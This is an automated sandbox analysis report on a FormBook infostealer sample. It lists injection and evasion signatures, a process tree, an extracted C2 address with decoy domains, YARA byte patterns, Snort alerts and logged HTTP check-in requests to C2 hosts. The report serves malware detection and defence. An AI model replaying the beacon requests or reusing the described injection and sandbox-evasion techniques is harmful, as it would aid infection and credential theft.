Loading ...

Play interactive tourEdit tour

Analysis Report SKlGhwkzTi

Overview

General Information

Sample Name:SKlGhwkzTi (renamed file extension from none to exe)
Analysis ID:432735
MD5:8252e0bd8e579259cc18ceae0c5c6d64
SHA1:242c3feb78e57de5c30b6f4f6b6d5d9b3332eb08
SHA256:21b3aba425cfa96bd3c5db2b306591a3a2aa1c8ee6fbdeddfdf60b5e1c0df0ea
Tags:exetrojan
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SKlGhwkzTi.exe (PID: 6896 cmdline: 'C:\Users\user\Desktop\SKlGhwkzTi.exe' MD5: 8252E0BD8E579259CC18CEAE0C5C6D64)
    • SKlGhwkzTi.exe (PID: 4484 cmdline: C:\Users\user\Desktop\SKlGhwkzTi.exe MD5: 8252E0BD8E579259CC18CEAE0C5C6D64)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • help.exe (PID: 6296 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
        • cmd.exe (PID: 7140 cmdline: /c del 'C:\Users\user\Desktop\SKlGhwkzTi.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 6932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    0000000D.00000002.918580029.0000000003510000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000D.00000002.918580029.0000000003510000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 21 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.SKlGhwkzTi.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.SKlGhwkzTi.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.SKlGhwkzTi.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158a9:$sqlite3step: 68 34 1C 7B E1
        • 0x159bc:$sqlite3step: 68 34 1C 7B E1
        • 0x158d8:$sqlite3text: 68 38 2A 90 C5
        • 0x159fd:$sqlite3text: 68 38 2A 90 C5
        • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
        4.2.SKlGhwkzTi.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.SKlGhwkzTi.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 10 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}
          Multi AV Scanner detection for domain / URLShow sources
          Source: adultpeace.comVirustotal: Detection: 6%Perma Link
          Multi AV Scanner detection for submitted fileShow sources
          Source: SKlGhwkzTi.exeVirustotal: Detection: 31%Perma Link
          Source: SKlGhwkzTi.exeReversingLabs: Detection: 41%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.918580029.0000000003510000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.677567627.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.763395770.0000000001530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.918604632.0000000003540000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.679714687.0000000003DE9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.763453752.0000000001560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.SKlGhwkzTi.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.SKlGhwkzTi.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.SKlGhwkzTi.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.SKlGhwkzTi.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SKlGhwkzTi.exe.3de9930.1.raw.unpack, type: UNPACKEDPE
          Source: 4.2.SKlGhwkzTi.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.0.SKlGhwkzTi.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: SKlGhwkzTi.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: SKlGhwkzTi.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.700218908.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: SKlGhwkzTi.exe, 00000004.00000002.764137531.000000000195F000.00000040.00000001.sdmp, help.exe, 0000000D.00000002.918935858.00000000039A0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: SKlGhwkzTi.exe, help.exe
          Source: Binary string: help.pdbGCTL source: SKlGhwkzTi.exe, 00000004.00000002.763881170.0000000001830000.00000040.00000001.sdmp
          Source: Binary string: help.pdb source: SKlGhwkzTi.exe, 00000004.00000002.763881170.0000000001830000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.700218908.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_02C315E0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_02C315D0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4x nop then pop edi4_2_00416282
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4x nop then pop ebx4_2_00406A94
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop edi13_2_032F6282
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop ebx13_2_032E6A95

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 151.106.118.75:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 151.106.118.75:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 151.106.118.75:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 192.169.223.13:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 192.169.223.13:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 192.169.223.13:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.adultpeace.com/p2io/
          Source: global trafficHTTP traffic detected: GET /p2io/?xN6x=es7Y2j6d/8vbylETtmEK+cycNhd4T49F/A456A8m/a4HPEjAATL8KRpgCeYlIlfO3VWH&YluDM=Ofc4YV0pThsp HTTP/1.1Host: www.hiddenwholesale.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?xN6x=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xDwAHOv6iOkY&YluDM=Ofc4YV0pThsp HTTP/1.1Host: www.anewdistraction.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?xN6x=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YLJeQ+Gz7y&YluDM=Ofc4YV0pThsp HTTP/1.1Host: www.cleanxcare.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?xN6x=IctutJlD1KzdQk/q9eJAOxuhjWEnlD6jXMe1IpO47rzJ4yHlcjfL6JMqKvIaYl5lDyXZ&YluDM=Ofc4YV0pThsp HTTP/1.1Host: www.biztekno.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?xN6x=V9Q6YNEsmUTgun1x6j8RVRt0udPCykKEN/zK+I9/XCzeOC650o3noXQhbdRFxPUlYrbD&YluDM=Ofc4YV0pThsp HTTP/1.1Host: www.69-1hn7uc.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?xN6x=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O25ts36CozLG&YluDM=Ofc4YV0pThsp HTTP/1.1Host: www.cyrilgraze.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?xN6x=r2GsjHfGgcaZI4XPmfqM84hqAY3LnZYXU2G/Xsttb0tqrt8DFa/RFFebhWMTMoil/lgU&YluDM=Ofc4YV0pThsp HTTP/1.1Host: www.centergolosinas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 104.21.65.7 104.21.65.7
          Source: Joe Sandbox ViewIP Address: 198.185.159.144 198.185.159.144
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: PLUSSERVER-ASN1DE PLUSSERVER-ASN1DE
          Source: global trafficHTTP traffic detected: GET /p2io/?xN6x=es7Y2j6d/8vbylETtmEK+cycNhd4T49F/A456A8m/a4HPEjAATL8KRpgCeYlIlfO3VWH&YluDM=Ofc4YV0pThsp HTTP/1.1Host: www.hiddenwholesale.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?xN6x=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xDwAHOv6iOkY&YluDM=Ofc4YV0pThsp HTTP/1.1Host: www.anewdistraction.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?xN6x=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YLJeQ+Gz7y&YluDM=Ofc4YV0pThsp HTTP/1.1Host: www.cleanxcare.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?xN6x=IctutJlD1KzdQk/q9eJAOxuhjWEnlD6jXMe1IpO47rzJ4yHlcjfL6JMqKvIaYl5lDyXZ&YluDM=Ofc4YV0pThsp HTTP/1.1Host: www.biztekno.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?xN6x=V9Q6YNEsmUTgun1x6j8RVRt0udPCykKEN/zK+I9/XCzeOC650o3noXQhbdRFxPUlYrbD&YluDM=Ofc4YV0pThsp HTTP/1.1Host: www.69-1hn7uc.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?xN6x=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O25ts36CozLG&YluDM=Ofc4YV0pThsp HTTP/1.1Host: www.cyrilgraze.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?xN6x=r2GsjHfGgcaZI4XPmfqM84hqAY3LnZYXU2G/Xsttb0tqrt8DFa/RFFebhWMTMoil/lgU&YluDM=Ofc4YV0pThsp HTTP/1.1Host: www.centergolosinas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.hiddenwholesale.com
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: SKlGhwkzTi.exe, 00000000.00000002.679283133.0000000002DE1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000006.00000000.716763832.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: help.exe, 0000000D.00000002.919483231.0000000004052000.00000004.00000001.sdmpString found in binary or memory: https://www.cyrilgraze.com/p2io/?xN6x=PONkgH6MO5ViG

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.918580029.0000000003510000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.677567627.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.763395770.0000000001530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.918604632.0000000003540000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.679714687.0000000003DE9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.763453752.0000000001560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.SKlGhwkzTi.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.SKlGhwkzTi.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.SKlGhwkzTi.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.SKlGhwkzTi.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SKlGhwkzTi.exe.3de9930.1.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
